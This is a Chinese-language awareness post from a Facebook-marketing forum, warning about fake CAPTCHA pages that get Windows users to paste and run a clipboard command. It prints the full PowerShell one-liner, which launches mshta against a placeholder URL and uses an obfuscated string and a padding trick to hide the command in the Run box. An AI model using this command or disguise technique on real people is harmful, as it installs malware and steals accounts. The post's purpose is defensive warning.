网络安全是个永远绕不过的话题,各种账号的保护,防盗也需要大家一直小心小心再小心。
网络安全平台报告了一种新的盗号手段,通过网络验证的方式,给电脑安装木马程序,从而盗取你的账号,不仅仅是Facebook账号,而是你电脑里的所有账号。
为防止这种方式被不法分子利用,这里隐藏原网页的截图。
这种方式先模拟一个看起来很真实的页面,诱导用户做人机确认(人机确认是一种非常常见的网络安全防护手段),很多人会自动忽略安全检查,而直接点击。如下图:
这个人机检测不是常见的拉横条,补完整图片,选红绿灯,而是给了几个步骤(仅针对Windows电脑)。
当你根据指示按下Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ 'I am not a robot: CAPTCHA Verification UID: 7811'。如下图:
看起来确实是在做人机验证,但,只要你按一下回车,你的电脑就会下载并执行攻击者的木马。
你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:
powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'
这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框的宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。
同样买来的账号,有的人从不出问题,有的人天天丢号,多找找自己的原因,在互联网上做事,你是否真的认真核验了所有链接和行为,一不小心多点一次按键,你就成为了别人的鱼肉。
关注Veryfb,我们为了你的账号安全,竭尽全力。
fbspider - 人人必备的Facebook工具
自动化管理Facebook账号,主页,BM,像素等资产的数据,权限
Veryfb出品
官方网站:https://www.fbspider.com
论坛讨论:https://veryfb.com/t/fbspider
最新动态
强烈推荐
账号安全
什么是 Facebook 帐户克隆? 你买Facebook账号吗?这个文章帮你省10万! 秘籍:更换Facebook个号密码的时候, 邮箱验证码会发送到账号原始邮箱的解决方案 小心"李鬼版"EditThisCookie,它正在盗取你的Facebook账号 又一公司Facebook广告账户被盗刷近500万美金,你的广告账户安全吗?
账号知识
扩展阅读
Veryfb官方服务
Veryfb Official Service
官
方
1
FB/GG/TT企业账号开户服务
详见:https://veryfb.com/d/16904
2
付费咨询,知识变现,资源买售服务
详见:https://veryfb.com/d/18127
Veryfb
网址:https://veryfb.com
最专业的Digital Marketing论坛,我们与你一起结伴前行。
Veryfb活跃着一众Facebook、Google、Tiktok大佬,汇集了包括中国大陆,香港,台湾,新加坡,马来西亚等全球华人从业者。
没有评论:
发表评论